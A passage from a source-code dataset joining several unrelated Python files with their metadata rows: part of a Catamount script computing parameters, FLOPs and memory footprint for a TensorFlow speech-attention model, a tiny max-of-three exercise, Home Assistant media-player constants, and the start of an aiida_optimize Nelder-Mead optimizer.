'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/while/basic_lstm_cell/BiasAdd/Enter_grad/b_acc': [4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/while/basic_lstm_cell/MatMul/Enter_grad/b_acc': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/while/basic_lstm_cell/BiasAdd/Enter_grad/b_acc': [4 * enc_hidden_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/while/basic_lstm_cell/MatMul/Enter_grad/b_acc': [3 * enc_hidden_dim_symbol, 4 * enc_hidden_dim_symbol],
}
# Update constant values
const_dict = {
'attn_model/AffineAttentionStateNN/Reshape/shape': [-1, 2 * enc_hidden_dim_symbol],
'attn_model/AffineAttentionStateNN/Reshape_1/shape/2': attn_dim_symbol,
'attn_model/AttentionEncoderDecoder/Reshape/shape/1': output_vocab_symbol,
'attn_model/AttentionModel/gradients/attn_model/AffineAttentionStateNN/add_grad/Shape_1': [attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/add_grad/Shape_1': [output_vocab_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/add_2_grad/Shape_1': [attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/conv1d/Conv2D_grad/Const': [1, conv_width_symbol, 1, num_conv_filters_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/conv1d/ExpandDims_1_grad/Shape': [conv_width_symbol, 1, num_conv_filters_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/conv1d_1/Conv2D_grad/Const': [1, 1, num_conv_filters_symbol, attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/conv1d_1/ExpandDims_1_grad/Shape': [1, num_conv_filters_symbol, attn_dim_symbol],
'attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/mul_grad/Shape_1': [attn_dim_symbol],
'attn_model/Decoder/CustomLSTMCellZeroState/Const': [2 * attn_hidden_dim_symbol],
'attn_model/Decoder/CustomLSTMCellZeroState/Const_1': [2 * attn_hidden_dim_symbol],
'attn_model/Decoder/CustomLSTMCellZeroState_1/Const': [2 * dec_hidden_dim_symbol],
'attn_model/Decoder/CustomLSTMCellZeroState_1/Const_1': [2 * dec_hidden_dim_symbol],
'attn_model/Decoder/while/attn_model/attention_cell/attention_cell/Shape': [attn_hidden_dim_symbol + 2 * enc_hidden_dim_symbol + output_vocab_symbol, 4 * attn_hidden_dim_symbol],
'attn_model/Decoder/while/attn_model/decoder_cell/decoder_cell/Shape': [attn_hidden_dim_symbol + dec_hidden_dim_symbol + 2 * enc_hidden_dim_symbol, 4 * dec_hidden_dim_symbol],
'attn_model/Decoder/while/attn_model/one_hot/depth': output_vocab_symbol,
'attn_model/Decoder/zeros/shape/1': 2 * enc_hidden_dim_symbol,
'attn_model/Decoder/zeros_2/shape/1': output_vocab_symbol,
'attn_model/Reshape/shape': [1, 1, audio_features_symbol],
'attn_model/Reshape_1/shape': [1, 1, audio_features_symbol],
'attn_model/Reshape_2/shape/2': 2 * enc_hidden_dim_symbol,
'attn_model/StackedEncoder/Layer0/RNNEncoder/Reshape/shape/2': audio_features_symbol,
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/BasicLSTMCellZeroState/Const': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/BasicLSTMCellZeroState/Const_1': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/Const_1': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/Const_4': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/BasicLSTMCellZeroState/Const': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/BasicLSTMCellZeroState/Const_1': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/Const_1': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/Const_4': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/Reshape/shape/2': 2 * enc_hidden_dim_symbol,
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/BasicLSTMCellZeroState/Const': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/BasicLSTMCellZeroState/Const_1': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/Const_1': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/Const_4': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/BasicLSTMCellZeroState/Const': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/BasicLSTMCellZeroState/Const_1': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/Const_1': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/Const_4': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/Reshape/shape/2': 2 * enc_hidden_dim_symbol,
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/BasicLSTMCellZeroState/Const': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/BasicLSTMCellZeroState/Const_1': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/Const_1': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/Const_4': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/BasicLSTMCellZeroState/Const': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/BasicLSTMCellZeroState/Const_1': [2 * enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/Const_1': [enc_hidden_dim_symbol],
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/Const_4': [enc_hidden_dim_symbol],
}
graph.bindConstantValues(const_dict)
# TODO: Currently, Catamount doesn't automatically handle Tensorflow TensorArrays
# or Stack ops. Here, manually set the dimensions of these ops' tensors.
for op in graph._ops_by_name.values():
op_name_suffix = op.name.split('/')[-1]
if 'TensorArrayGather' in op_name_suffix:
assert isinstance(op, UnknownOp)
assert len(op._inputs) == 3
assert len(op._outputs) == 1
if op._outputs[0].shape.rank == 1 or op._outputs[0].shape.rank == 2:
if len(op._outputs[0].consumers) > 0:
print('TODO: Unknown TensorArrayGather (rank {}): {}'
.format(op._outputs[0].shape.rank, op.debugString()))
elif op._outputs[0].shape.isUnknown() or op._outputs[0].shape.rank == 3:
if len(op._outputs[0].consumers) > 0:
# If output rank is 3, then appears to be:
# [seq_length, batch_size, enc_hid], where
# seq_length depends on layer
out_shape = None
if 'StackedEncoder/Layer0' in op.name:
out_shape = [encoder_steps_symbol,
subbatch_size_symbol,
enc_hidden_dim_symbol]
elif 'StackedEncoder/Layer2' in op.name:
if 'attn_model/AttentionModel/gradients' in op.name:
# Backprop stores concatenated state
out_shape = [encoder_steps_symbol // 2,
subbatch_size_symbol,
2 * enc_hidden_dim_symbol]
else:
out_shape = [encoder_steps_symbol // 2,
subbatch_size_symbol,
enc_hidden_dim_symbol]
elif 'StackedEncoder/Layer4' in op.name:
if 'attn_model/AttentionModel/gradients' in op.name:
# Backprop stores concatenated state
out_shape = [(encoder_steps_symbol // 2) // 2,
subbatch_size_symbol,
2 * enc_hidden_dim_symbol]
else:
out_shape = [(encoder_steps_symbol // 2) // 2,
subbatch_size_symbol,
enc_hidden_dim_symbol]
elif 'Decoder' in op.name:
# HAXXXX: Manually specify a few
if op.name == 'attn_model/Decoder/TensorArrayStack/TensorArrayGatherV3':
out_shape = [decoder_steps_symbol,
subbatch_size_symbol,
output_vocab_symbol]
else:
out_shape = [decoder_steps_symbol,
subbatch_size_symbol,
dec_hidden_dim_symbol]
else:
print('TODO: Unknown TensorArrayGather {}'
.format(op.debugString()))
if out_shape is not None:
op._outputs[0].mergeShape(out_shape, make_symbolic=True)
else:
print('TODO: Unknown TensorArrayGather {}'
.format(op.debugString()))
elif 'TensorArraySize' in op_name_suffix:
assert isinstance(op, UnknownOp)
assert len(op._inputs) == 2
assert len(op._outputs) == 1
assert op._outputs[0].shape.rank == 0
# NOTES:
# StackedEncoder Layer0: enc_seq
# StackedEncoder Layer2: enc_seq / 2 # Due to stride 2 in time
# StackedEncoder Layer4: enc_seq / 4 # Due to stride 2 in time
# Decoder: dec_seq
if 'StackedEncoder/Layer0' in op.name:
op._outputs[0].setValue(encoder_steps_symbol)
elif 'StackedEncoder/Layer2' in op.name:
op._outputs[0].setValue(encoder_steps_symbol // 2)
elif 'StackedEncoder/Layer4' in op.name:
op._outputs[0].setValue((encoder_steps_symbol // 2) // 2)
elif 'Decoder' in op.name:
op._outputs[0].setValue(decoder_steps_symbol)
else:
print('WARN: Unknown TensorArraySizeV3: {}'
.format(op.debugString()))
elif 'TensorArrayRead' in op_name_suffix:
assert isinstance(op, UnknownOp)
assert len(op._inputs) == 3
assert len(op._outputs) == 1
assert op._outputs[0].shape.isUnknown() or \
op._outputs[0].shape.rank == 2, \
'{}'.format(op.name)
if op._outputs[0].shape.isUnknown():
if len(op._outputs[0].consumers) > 0:
out_shape = None
if 'attn_model/AttentionModel/gradients/attn_model/StackedEncoder/Layer' in op.name and \
('/RNNEncoder/bidirectional_rnn/fw/fw/while/TensorArrayWrite/TensorArrayWriteV3_grad/TensorArrayReadV3' in op.name or \
'/RNNEncoder/bidirectional_rnn/bw/bw/while/TensorArrayWrite/TensorArrayWriteV3_grad/TensorArrayReadV3' in op.name):
out_shape = [subbatch_size_symbol,
enc_hidden_dim_symbol]
elif op.name == 'attn_model/AttentionModel/gradients/attn_model/Decoder/TensorArrayWrite/TensorArrayWriteV3_grad/TensorArrayReadV3' or \
op.name == 'attn_model/AttentionModel/gradients/attn_model/Decoder/while/TensorArrayWrite_1/TensorArrayWriteV3_grad/TensorArrayReadV3' or \
op.name == 'attn_model_2/Decoder/while/cond/TensorArrayReadV3' or \
op.name == 'attn_model/Decoder/while/cond/TensorArrayReadV3':
out_shape = [subbatch_size_symbol,
output_vocab_symbol]
else:
print('WARN: Unknown TensorArrayReadV3 out shape: {}'
.format(op.debugString()))
if out_shape is not None:
op._outputs[0].mergeShape(out_shape, make_symbolic=True)
else:
# NOTES: Many are (?, 40 "features"), (?, 1051 "enc_hid"), or (?, 2102 "2*enc_hid")
dim_1_val = op._outputs[0].shape.getDimension(1).value
assert dim_1_val == base_audio_features or \
dim_1_val == base_enc_hidden_dim or \
dim_1_val == 2 * base_enc_hidden_dim, \
'Op: {}\n Dim 1 value: {}'.format(op.debugString(), dim_1_val)
out_shape = None
if dim_1_val == base_audio_features:
out_shape = [subbatch_size_symbol, audio_features_symbol]
elif dim_1_val > 0 and dim_1_val % base_enc_hidden_dim == 0:
mult = dim_1_val // base_enc_hidden_dim
out_shape = [subbatch_size_symbol, mult * enc_hidden_dim_symbol]
else:
print('Unhandled TensorArrayRead: {}'.format(op.debugString()))
if out_shape is not None:
op._outputs[0].mergeShape(out_shape, make_symbolic=True)
# Manually set a couple shapes for max ops that can't yet resolve
# maximums of 1 vs. positive symbols:
max_op = graph._ops_by_name['attn_model/AttentionModel/gradients/attn_model/AttentionEncoderDecoder/Sum_grad/Maximum']
max_op._outputs[0].mergeShape([2])
max_op._outputs[0].setValue([1, subbatch_size_symbol])
max_op = graph._ops_by_name['attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/Sum_grad/Maximum']
max_op._outputs[0].mergeShape([3])
# [floor(floor(encoder_steps/2)/2) subbatch_size 1]
max_op._outputs[0].setValue([(encoder_steps_symbol // 2) // 2,
subbatch_size_symbol, 1])
max_op = graph._ops_by_name['attn_model/AttentionModel/gradients/attn_model/Decoder/while/attn_model/Sum_1_grad/Maximum']
max_op._outputs[0].mergeShape([3])
# [1 subbatch_size 2*enc_hidden_dim]
max_op._outputs[0].setValue([1, subbatch_size_symbol,
2 * enc_hidden_dim_symbol])
print('Binding variables')
graph.bindShapesAndPropagate(bind_dict, warn_if_ill_defined=(not is_pytest_run), make_symbolic=True)
assert graph.isValid()
print('\n\nCleaned Graph:\n{}'.format(graph))
print('\n\nBound values')
# Set base values to be subbed in:
base_encoder_steps = 96
base_decoder_steps = 24
base_attn_dim = 128
base_conv_width = 50
base_attn_hidden_dim = 512
base_dec_hidden_dim = 512
base_enc_hidden_dim = 1024
bind_subs = { audio_features_symbol: base_audio_features,
encoder_steps_symbol: base_encoder_steps,
decoder_steps_symbol: (encoder_steps_symbol // 2) // 2,
subbatch_size_symbol: base_subbatch_size,
attn_dim_symbol: base_attn_dim,
attn_hidden_dim_symbol: enc_hidden_dim_symbol // 2,
dec_hidden_dim_symbol: enc_hidden_dim_symbol // 2,
output_vocab_symbol: base_output_vocab,
conv_width_symbol: base_conv_width,
enc_hidden_dim_symbol: base_enc_hidden_dim,
num_conv_filters_symbol: 4,
graph_iters_symbol: 1,
}
# Add loop iteration counts to bind_subs
bind_str_subs = {
'attn_model/AttentionModel/gradients/b_count_2_block::iters': decoder_steps_symbol,
'attn_model/Decoder/while/LoopCond_block::iters': decoder_steps_symbol,
'attn_model/AttentionModel/gradients/b_count_22_block::iters': encoder_steps_symbol,
'attn_model/AttentionModel/gradients/b_count_26_block::iters': encoder_steps_symbol,
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/bw/bw/while/LoopCond_block::iters': encoder_steps_symbol,
'attn_model/StackedEncoder/Layer0/RNNEncoder/bidirectional_rnn/fw/fw/while/LoopCond_block::iters': encoder_steps_symbol,
'attn_model/AttentionModel/gradients/b_count_14_block::iters': encoder_steps_symbol // 2,
'attn_model/AttentionModel/gradients/b_count_18_block::iters': encoder_steps_symbol // 2,
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/bw/bw/while/LoopCond_block::iters': encoder_steps_symbol // 2,
'attn_model/StackedEncoder/Layer2/RNNEncoder/bidirectional_rnn/fw/fw/while/LoopCond_block::iters': encoder_steps_symbol // 2,
'attn_model/AttentionModel/gradients/b_count_6_block::iters': (encoder_steps_symbol // 2) // 2,
'attn_model/AttentionModel/gradients/b_count_10_block::iters': (encoder_steps_symbol // 2) // 2,
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/bw/bw/while/LoopCond_block::iters': (encoder_steps_symbol // 2) // 2,
'attn_model/StackedEncoder/Layer4/RNNEncoder/bidirectional_rnn/fw/fw/while/LoopCond_block::iters': (encoder_steps_symbol // 2) // 2,
}
for var_name, sub_val in bind_str_subs.items():
var_ref = utils.getIntSymbolFromString(var_name)
assert var_name not in bind_subs.keys()
bind_subs[var_ref] = sub_val
# Calculate model parameter count
parameters = graph.calcModelParameters()
resolved_params = parameters.subs(bind_subs)
try:
resolved_params = int(resolved_params)
except:
print('ERROR: resolved_params should be int, but is {} = {}'.format(
type(resolved_params), resolved_params))
correct_params = 71084729
assert resolved_params == correct_params, \
'Incorrect model params: {}'.format(resolved_params)
print('Parameters: {}\nWith specified dims: {}\n'.format(parameters, resolved_params))
# Calculate algorithmic Flops
alg_flops = graph.calcAlgFlops()
resolved_flops = alg_flops.subs(bind_subs)
try:
resolved_flops = int(resolved_flops)
except:
print('ERROR: resolved_flops should be int, but is {} = {}'.format(
type(resolved_flops), resolved_flops))
correct_flops = 568878183032
assert resolved_flops == correct_flops, \
'Incorrect algorithmic flops: {}'.format(resolved_flops)
print('Algorithmic Flops: {}\nWith specified dims: {}\n'.format(alg_flops, resolved_flops))
# Calculate algorthmic Bytes accessed
alg_bytes = graph.calcAlgBytes()
resolved_bytes = alg_bytes.subs(bind_subs)
try:
resolved_bytes = int(resolved_bytes)
except:
print('ERROR: resolved_bytes should be int, but is {} = {}'.format(
type(resolved_bytes), resolved_bytes))
correct_bytes = 92231419797
assert resolved_bytes == correct_bytes, \
'Incorrect algorithmic bytes: {}'.format(resolved_bytes)
print('Alg bytes accessed: {}\nWith specified dims: {}\n'.format(alg_bytes, resolved_bytes))
# Calculate algorthmic Bytes accessed
alg_footprint = graph.calcAlgFootprint()
resolved_footprint = alg_footprint.subs(bind_subs)
try:
resolved_footprint = int(resolved_footprint)
except:
print('ERROR: resolved_footprint should be int, but is {} = {}'.format(
type(resolved_footprint), resolved_footprint))
correct_footprint = 32624988214
assert resolved_footprint == correct_footprint, \
'Incorrect algorithmic footprint: {}'.format(resolved_footprint)
print('Alg mem footprint: {}\nWith specified dims: {}\n'.format(alg_footprint, resolved_footprint))
# Calculate algorithmic IO per step
total_io_footprint = 0
for op in graph.getPlaceholders():
total_io_footprint += op.calcAlgFootprint()
resolved_io_footprint = total_io_footprint.subs(bind_subs)
print('Alg IO footprint: {}\nWith specified dims: {}\n'.format(total_io_footprint, resolved_io_footprint))
print('VERBOSE ALGORTHMIC FLOPS:')
graph.calcAlgFlops(verbose=True)
print('')
print('VERBOSE ALGORTHMIC BYTES:')
graph.calcAlgBytes(verbose=True)
print('')
print('VERBOSE ALGORTHMIC FOOTPRINT:')
graph.calcAlgFootprint(verbose=True)
print('')
# HACKY WAY TO SAVE MODELS FOR NOW!
pickle.dump(graph, open('catamount/frameworks/example_graphs/tensorflow/full_models/speech_attention/graph_speech_attention.p', 'wb'))
if is_pytest_run:
return
print('\n\n======= Algorithmic graph-level analytics: =======')
encoder_dims = [32, 64, 96, 128, 160, 192, 256, 320, 384, 448, 512, 640, 768, 892, 1024, 1152, 1280, 1408, 1548, 1702, 1872, 2059, 2264, 2490, 2739, 3012, 3289]
base_encoder_steps = 335
base_subbatch_size = 32
base_attn_dim = 128
base_conv_width = 50
base_attn_hidden_dim = 512
base_dec_hidden_dim = 512
base_enc_hidden_dim = 1024
bind_subs[audio_features_symbol] = base_audio_features
bind_subs[encoder_steps_symbol] = base_encoder_steps
bind_subs[decoder_steps_symbol] = (encoder_steps_symbol // 2) // 2
bind_subs[subbatch_size_symbol] = base_subbatch_size
bind_subs[attn_dim_symbol] = base_attn_dim
bind_subs[attn_hidden_dim_symbol] = enc_hidden_dim_symbol // 2
bind_subs[dec_hidden_dim_symbol] = enc_hidden_dim_symbol // 2
bind_subs[output_vocab_symbol] = base_output_vocab
bind_subs[conv_width_symbol] = base_conv_width
# bind_subs[enc_hidden_dim_symbol] = base_enc_hidden_dim
bind_subs[num_conv_filters_symbol] = 4
bind_subs[graph_iters_symbol] = 1
bind_subs.pop(enc_hidden_dim_symbol)
resolved_params = parameters.subs(bind_subs)
print('Symbol associations: {}\n'.format(bind_subs))
print('Algorithmic Flops by hidden dimension, params, and per-batch-sample:')
resolved_flops = alg_flops.subs(bind_subs)
for enc_dim in encoder_dims:
graph_params = resolved_params.subs({enc_hidden_dim_symbol: enc_dim})
graph_flops = resolved_flops.subs({enc_hidden_dim_symbol: enc_dim})
graph_flops_per_sample = float(graph_flops) / \
bind_subs[subbatch_size_symbol]
print('{}\t{}\t{}\t{}'.format(enc_dim, graph_params, graph_flops,
int(graph_flops_per_sample)))
print('\nAlgorithmic bytes accessed by hidden dimension, params:')
resolved_bytes = alg_bytes.subs(bind_subs)
for enc_dim in encoder_dims:
graph_params = resolved_params.subs({enc_hidden_dim_symbol: enc_dim})
graph_bytes = resolved_bytes.subs({enc_hidden_dim_symbol: enc_dim})
print('{}\t{}\t{}'.format(enc_dim, graph_params, graph_bytes))
print('\nAlgorithmic memory footprint by hidden dimension, params:')
resolved_footprint = alg_footprint.subs(bind_subs)
for enc_dim in encoder_dims:
graph_params = resolved_params.subs({enc_hidden_dim_symbol: enc_dim})
graph_footprint = resolved_footprint.subs({enc_hidden_dim_symbol: enc_dim})
print('{}\t{}\t{}'.format(enc_dim, graph_params, graph_footprint))
print('\nAlgorithmic minimal memory footprint by hidden dimension, params:')
full_subs = dict(bind_subs)
for enc_dim in encoder_dims:
graph_params = resolved_params.subs({enc_hidden_dim_symbol: enc_dim})
full_subs[enc_hidden_dim_symbol] = enc_dim
graph_min_foot = graph.calcMinimalFootprint(symbol_subs=full_subs)
print('{}\t{}\t{}'.format(enc_dim, graph_params, graph_min_foot))
if __name__ == "__main__":
run_tf_speech_attention()
| 65.788427
| 247
| 0.681015
|
5137e386269eb5d03ccf0fe3773cf9258124be38
| 96
|
py
|
Python
|
Python/Programming Fundamentals/Basic Syntax/01. Biggest three numbers.py
|
teodoramilcheva/softuni-software-engineering
|
98dc9faa66f42570f6538fd7ef186d2bd1d39bff
|
[
"MIT"
] | null | null | null |
Python/Programming Fundamentals/Basic Syntax/01. Biggest three numbers.py
|
teodoramilcheva/softuni-software-engineering
|
98dc9faa66f42570f6538fd7ef186d2bd1d39bff
|
[
"MIT"
] | null | null | null |
Python/Programming Fundamentals/Basic Syntax/01. Biggest three numbers.py
|
teodoramilcheva/softuni-software-engineering
|
98dc9faa66f42570f6538fd7ef186d2bd1d39bff
|
[
"MIT"
] | null | null | null |
a = int(input())
b = int(input())
c = int(input())
max_num = max(a, b, c)
print(max_num)
| 13.714286
| 23
| 0.541667
|
8f5df65a696ee07dcd7bdd3ef4c72b5b9e357d3e
| 1,978
|
py
|
Python
|
homeassistant/components/media_player/const.py
|
markusxyz/core
|
d12c6dea5759f99bbea335392d8c9479776d84d5
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/media_player/const.py
|
markusxyz/core
|
d12c6dea5759f99bbea335392d8c9479776d84d5
|
[
"Apache-2.0"
] | null | null | null |
homeassistant/components/media_player/const.py
|
markusxyz/core
|
d12c6dea5759f99bbea335392d8c9479776d84d5
|
[
"Apache-2.0"
] | 1
|
2020-05-14T06:22:16.000Z
|
2020-05-14T06:22:16.000Z
|
"""Proides the constants needed for component."""
ATTR_APP_ID = "app_id"
ATTR_APP_NAME = "app_name"
ATTR_INPUT_SOURCE = "source"
ATTR_INPUT_SOURCE_LIST = "source_list"
ATTR_MEDIA_ALBUM_ARTIST = "media_album_artist"
ATTR_MEDIA_ALBUM_NAME = "media_album_name"
ATTR_MEDIA_ARTIST = "media_artist"
ATTR_MEDIA_CHANNEL = "media_channel"
ATTR_MEDIA_CONTENT_ID = "media_content_id"
ATTR_MEDIA_CONTENT_TYPE = "media_content_type"
ATTR_MEDIA_DURATION = "media_duration"
ATTR_MEDIA_ENQUEUE = "enqueue"
ATTR_MEDIA_EPISODE = "media_episode"
ATTR_MEDIA_PLAYLIST = "media_playlist"
ATTR_MEDIA_POSITION = "media_position"
ATTR_MEDIA_POSITION_UPDATED_AT = "media_position_updated_at"
ATTR_MEDIA_SEASON = "media_season"
ATTR_MEDIA_SEEK_POSITION = "seek_position"
ATTR_MEDIA_SERIES_TITLE = "media_series_title"
ATTR_MEDIA_SHUFFLE = "shuffle"
ATTR_MEDIA_TITLE = "media_title"
ATTR_MEDIA_TRACK = "media_track"
ATTR_MEDIA_VOLUME_LEVEL = "volume_level"
ATTR_MEDIA_VOLUME_MUTED = "is_volume_muted"
ATTR_MEDIA_VOLUME_CHANGE = "volume_change"
ATTR_SOUND_MODE = "sound_mode"
ATTR_SOUND_MODE_LIST = "sound_mode_list"
DOMAIN = "media_player"
MEDIA_TYPE_MUSIC = "music"
MEDIA_TYPE_TVSHOW = "tvshow"
MEDIA_TYPE_MOVIE = "movie"
MEDIA_TYPE_VIDEO = "video"
MEDIA_TYPE_EPISODE = "episode"
MEDIA_TYPE_CHANNEL = "channel"
MEDIA_TYPE_PLAYLIST = "playlist"
MEDIA_TYPE_IMAGE = "image"
MEDIA_TYPE_URL = "url"
MEDIA_TYPE_GAME = "game"
MEDIA_TYPE_APP = "app"
SERVICE_CLEAR_PLAYLIST = "clear_playlist"
SERVICE_PLAY_MEDIA = "play_media"
SERVICE_SELECT_SOUND_MODE = "select_sound_mode"
SERVICE_SELECT_SOURCE = "select_source"
SUPPORT_PAUSE = 1
SUPPORT_SEEK = 2
SUPPORT_VOLUME_SET = 4
SUPPORT_VOLUME_MUTE = 8
SUPPORT_PREVIOUS_TRACK = 16
SUPPORT_NEXT_TRACK = 32
SUPPORT_TURN_ON = 128
SUPPORT_TURN_OFF = 256
SUPPORT_PLAY_MEDIA = 512
SUPPORT_VOLUME_STEP = 1024
SUPPORT_SELECT_SOURCE = 2048
SUPPORT_STOP = 4096
SUPPORT_CLEAR_PLAYLIST = 8192
SUPPORT_PLAY = 16384
SUPPORT_SHUFFLE_SET = 32768
SUPPORT_SELECT_SOUND_MODE = 65536
| 29.522388
| 60
| 0.827604
|
c68de737437a8b22f00d66202982159c45b625d2
| 11,917
|
py
|
Python
|
aiida_optimize/engines/_nelder_mead.py
|
greschd/aiida_optimize
|
4c7bc76e4ad7e40f6105e60f34b7a20e1ab3a122
|
[
"Apache-2.0"
] | null | null | null |
aiida_optimize/engines/_nelder_mead.py
|
greschd/aiida_optimize
|
4c7bc76e4ad7e40f6105e60f34b7a20e1ab3a122
|
[
"Apache-2.0"
] | null | null | null |
aiida_optimize/engines/_nelder_mead.py
|
greschd/aiida_optimize
|
4c7bc76e4ad7e40f6105e60f34b7a20e1ab3a122
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# ******NOTICE***************
# optimize.py module by Travis E. Oliphant
#
# You may copy and use this module as you see fit with no
# guarantee implied provided you keep this notice in all copies.
# *****END NOTICE************
#
# The additional license terms given in ADDITIONAL_TERMS.txt apply to this
# file.
# pylint: disable=invalid-name
# © 2017-2019, ETH Zurich, Institut für Theoretische Physik
# Author: Dominik Gresch <greschd@gmx.ch>
"""
Defines a Nelder-Mead optimization engine.
"""
import typing as ty
import numpy as np
import scipy.linalg as la
from decorator import decorator
from aiida import orm
from ..helpers import get_nested_result
from .base import OptimizationEngineImpl, OptimizationEngineWrapper
__all__ = ['NelderMead']
RHO = 1
CHI = 2
PSI = 0.5
SIGMA = 0.5
def update_method(next_submit=None):
"""
Decorator for methods which update the results.
"""
@decorator
def inner(func, self, outputs):
self.next_submit = next_submit
self.next_update = None
func(self, outputs)
return inner
def submit_method(next_update=None):
"""
Decorator for methods which submit new evaluations.
"""
@decorator
def inner(func, self):
self.next_submit = None
self.next_update = next_update
return func(self)
return inner
class _NelderMeadImpl(OptimizationEngineImpl):
"""
Implementation class for the Nelder-Mead optimization engine.
"""
def __init__( # pylint: disable=too-many-arguments
self,
simplex: ty.List[float],
fun_simplex: ty.Optional[ty.List[float]],
xtol: ty.Optional[float],
ftol: ty.Optional[float],
max_iter: int,
input_key: str,
result_key: str,
logger,
num_iter=0,
extra_points: ty.Optional[ty.Dict[str, ty.Tuple[float, float]]] = None,
next_submit='submit_initialize',
next_update=None,
finished=False,
exceeded_max_iters=False,
result_state=None,
):
super().__init__(logger=logger, result_state=result_state)
self.simplex = np.array(simplex)
assert len(self.simplex) == self.simplex.shape[1] + 1
self.fun_simplex: ty.Optional[np.ndarray]
if fun_simplex is None:
self.fun_simplex = None
else:
self.fun_simplex = np.array(fun_simplex)
self.xtol: float = xtol if xtol is not None else np.inf
self.ftol: float = ftol if ftol is not None else np.inf
self.max_iter = max_iter
self.num_iter = num_iter
if extra_points is None:
self.extra_points: ty.Dict[str, ty.Tuple[float, float]] = {}
else:
self.extra_points = dict(extra_points)
self.input_key = input_key
self.result_key = result_key
self.next_submit = next_submit
self.next_update = next_update
self.finished = finished
self.exceeded_max_iters = exceeded_max_iters
def _get_values(self, outputs):
return [get_nested_result(res, self.result_key).value for _, res in sorted(outputs.items())]
def _get_single_result(self, outputs):
(idx, ) = outputs.keys()
x = np.array(self._result_mapping[idx].input[self.input_key].get_attribute('list'))
f = get_nested_result(outputs[idx], self.result_key).value
return x, f
@submit_method(next_update='update_initialize')
def submit_initialize(self):
self._logger.report('Submitting initialization step.')
return [self._to_input_list(x) for x in self.simplex]
def _to_input_list(self, x):
input_list = orm.List()
input_list.extend(x)
return {self.input_key: input_list}
@update_method(next_submit='new_iter')
def update_initialize(self, outputs):
self.fun_simplex = np.array(self._get_values(outputs))
@submit_method()
def new_iter(self): # pylint: disable=missing-function-docstring
self.do_sort()
self.check_finished()
if self.finished:
self.next_update = 'finalize'
return []
self.num_iter += 1
self._logger.report(
f'Start of Nelder-Mead iteration {self.num_iter}, max number of iterations: {self.max_iter}.'
)
xr = (1 + RHO) * self.xbar - RHO * self.simplex[-1]
self.next_update = 'choose_step'
return [self._to_input_list(xr)]
@update_method()
def finalize(self, outputs):
pass
@property
def xbar(self):
return np.average(self.simplex[:-1], axis=0)
def do_sort(self):
idx = np.argsort(self.fun_simplex)
